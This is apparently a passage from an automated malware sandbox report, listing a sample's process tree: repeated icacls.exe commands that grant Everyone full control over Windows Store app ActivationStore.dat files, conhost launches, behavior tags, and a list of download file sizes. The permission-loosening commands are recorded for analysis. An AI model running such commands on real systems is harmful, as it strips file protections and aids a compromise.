C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB